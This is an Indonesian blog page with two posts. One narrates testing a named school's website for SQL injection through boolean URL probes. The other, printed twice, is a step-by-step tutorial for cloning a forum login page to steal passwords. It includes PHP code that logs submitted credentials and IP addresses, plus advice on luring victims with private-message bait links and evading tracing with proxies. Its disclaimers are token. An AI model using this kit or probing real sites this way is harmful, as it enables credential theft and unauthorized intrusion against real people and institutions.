Hm...pagi-pagi iseng nih, pengen cari hiburan. Chating bosen ngetik terus gk ada yg pakai vc. Eh..tiba-tiba keponakan di Mojokerto telphon nanya kabar. ''Gimana batam hari ini lek (om-bhs indonesia)'' , Baik...meski kadang-kadang cuaca gak bersahabat.
gak lama dia nanya, ''Lek, tolong cek dong website sekolahku, cari tahu apa yang harus di perbaiki?'' hmmm....gw lupa sekolah dia dimana? wkwkwkw.....(dasar oom gak perhatian hehe..). ''gak tahu apa alamat URL nya?'' -waduh..rupanya dia sekolah si SMKN 1 Pungging! weleh.....coba-coba bantu keponakan sekalian cari hiburan nih.
ok deh, langsung aja yah: udah dikasih tahu nih gw url websitenya : www.smkn1pungging.sch.id
Hm...ternyata websitenya PHP , wah pakai metode lama nih, pakai cara injeksi SQL.
target sudah jelas, kita test dulu apakah website ini bisa di injeksi?
Ok kita test dulu BUG nya. APakah website ini bisa di injeksi. dengan metode menambahkan (and 1=0 + and 1=1).
Waduh....ternyata waktu gw buka alamat target
www.smkn1pungging.id/index.php?load=home&vi=story&id_berita=2 and 1=0
>> LO KOK BERITA NYA MENGHILANG!!
www.smkn1pungging.id/index.php?load=home&vi=story&id_berita=2 and 1=1
>>Lo BERITA NYA MUNCUL LAGI!!
Weleh-weleh.......gw langsung pencet tuh nomor keponakan, call balik. Tuh website 99 persen
bisa di injeksi.....
Rencana injeksi gagal! byuh menjelang jam 5 kok speedy putus nyambung......:sssszzzztt:
Besok malam aja deh dilanjut..mata gw dah ngantuk.......jam 9 pagi mau kerja....-bersambung. - tunggu kelanjutanya ya...
''Sebelumnya, Mhn maaf pihak2 yang merasa di rugikan maksud tulisan ini dibuat hanya untuk pengetahuan'
Friday, February 27, 2009
Jalan Untuk Merampok Password Admin Forum
Oleh: Magid - Inspirasi dari Meong
Bagaimana sih caranya membuat forum phiser trus tentu cara menggunakan dengan baik dan benar? Berikut ini adalah tutorial untuk membuat phising forum. ....hmmm....gak usah lama-lama deh, langsung aja kita mulai.
Persiapan:
pertama2 anda harus membuat 3 file yaitu
index.html
next.php
ppp.txt
nah pada file next.php masukkan code ini
Code:
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: http://target.com");
$handle = fopen("ppp.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
atau untuk lebih memudahkan anda contoh sudah ada disini...
http://www.mediafire.com/?diddyvyxkwo
Setelah persiapan diatas selesai sekarang anda menuju target forum yang anda ingin buat phisernya..
pada forum target cari halaman loginnya...
setelah anda di forum login click kanan terus view source code ( bila anda menggunakan firefox tekan ctrl+u)
copy paste seluruh source codenya ke file index.html yang anda telah sediakan...
edit index.html anda trus cari method="post" dan gantikan dengan method="get"
cari juga action="alamat link" gantikan dengan action="next.php"
dengan itu password log akan disafe di file ppp.txt
sekarang upload 3 file tersebut ke freehosting ( wets klo soal ini jgn tanya gue yach... ntar gue dikira promosi lagi T_T)
setelah upload terlebih kita check dulu.... nah mungkin anda akan melihat beberapa error
nah kita umpakan target kita terlihat seperti http://dickdownload.com/ copy url
terus pada index.html kita search href=
nah kita ganti . dengan alamat forum dia...
contohnya:
kita menemukan ./styles/hestia_blue/theme/mac.css
nah setelah kita ubah jadinya http://dickdownload.com/styles/hestia_b ... me/mac.css
nah lakukan begitu pada semua href link...
nah untuk menyamakan style ( gambarnya) kita search src dan lakukan serperti cara diatas...
selesai semua kita chmood 777 3 file itu dan menuju ke proses utama.... apa itu ...???
tentu saja menipu seseorang dengan phising kita wkakkwakwakwakaw....
nah dalam tutorial ini saya akan memberikan sedikit tips and trick...( tentu saja sudah saya lakukan :P)
1. Diharapkan menggunakan phising forum pada pm ( private message)
2. Jangan membuat phising link anda terlihat pendek ( usahakan panjang )
3. Berhubung target kita forum gunakan bbcode nya contohnya
[url=phising link anda]contoh link yang ditujuh[/url]
4. Nah usahakan pm ke seseorang tentang suatu topic... ( tergantung creatifitas anda)
5. Jangan pernah melakukan phising dengan pm all member
6. Tidak lupa saat anda registrasi free hosting gunakan proxy yach ( menjaga kemungkinan terburuk).
nah ini contoh yang sering di pakai pake di forum luar sana
"Hey is this yours post?" atau "Did you uploaded this?" trus masukin aja
[url=phising link anda]contoh link yang ditujuh[/url]
Silahkan di ujicoba tips and trick. Semoga beruntung. Ini hanya sebuah tutorial, bukan bermaksud menyebarkan hal-hal yang menimbulkan kejahatan di dunia maya. Good Luck!!
Bagaimana sih caranya membuat forum phiser trus tentu cara menggunakan dengan baik dan benar? Berikut ini adalah tutorial untuk membuat phising forum. ....hmmm....gak usah lama-lama deh, langsung aja kita mulai.
Persiapan:
pertama2 anda harus membuat 3 file yaitu
index.html
next.php
ppp.txt
nah pada file next.php masukkan code ini
Code:
$datum = date('d-m-Y / H:i:s');
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: http://target.com");
$handle = fopen("ppp.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
atau untuk lebih memudahkan anda contoh sudah ada disini...
http://www.mediafire.com/?diddyvyxkwo
Setelah persiapan diatas selesai sekarang anda menuju target forum yang anda ingin buat phisernya..
pada forum target cari halaman loginnya...
setelah anda di forum login click kanan terus view source code ( bila anda menggunakan firefox tekan ctrl+u)
copy paste seluruh source codenya ke file index.html yang anda telah sediakan...
edit index.html anda trus cari method="post" dan gantikan dengan method="get"
cari juga action="alamat link" gantikan dengan action="next.php"
dengan itu password log akan disafe di file ppp.txt
sekarang upload 3 file tersebut ke freehosting ( wets klo soal ini jgn tanya gue yach... ntar gue dikira promosi lagi T_T)
setelah upload terlebih kita check dulu.... nah mungkin anda akan melihat beberapa error
nah kita umpakan target kita terlihat seperti http://dickdownload.com/ copy url
terus pada index.html kita search href=
nah kita ganti . dengan alamat forum dia...
contohnya:
kita menemukan ./styles/hestia_blue/theme/mac.css
nah setelah kita ubah jadinya http://dickdownload.com/styles/hestia_b ... me/mac.css
nah lakukan begitu pada semua href link...
nah untuk menyamakan style ( gambarnya) kita search src dan lakukan serperti cara diatas...
selesai semua kita chmood 777 3 file itu dan menuju ke proses utama.... apa itu ...???
tentu saja menipu seseorang dengan phising kita wkakkwakwakwakaw....
nah dalam tutorial ini saya akan memberikan sedikit tips and trick...( tentu saja sudah saya lakukan :P)
1. Diharapkan menggunakan phising forum pada pm ( private message)
2. Jangan membuat phising link anda terlihat pendek ( usahakan panjang )
3. Berhubung target kita forum gunakan bbcode nya contohnya
[url=phising link anda]contoh link yang ditujuh[/url]
4. Nah usahakan pm ke seseorang tentang suatu topic... ( tergantung creatifitas anda)
5. Jangan pernah melakukan phising dengan pm all member
6. Tidak lupa saat anda registrasi free hosting gunakan proxy yach ( menjaga kemungkinan terburuk).
nah ini contoh yang sering di pakai pake di forum luar sana
"Hey is this yours post?" atau "Did you uploaded this?" trus masukin aja
[url=phising link anda]contoh link yang ditujuh[/url]
Silahkan di ujicoba tips and trick. Semoga beruntung. Ini hanya sebuah tutorial, bukan bermaksud menyebarkan hal-hal yang menimbulkan kejahatan di dunia maya. Good Luck!!
Subscribe to:
Posts (Atom)
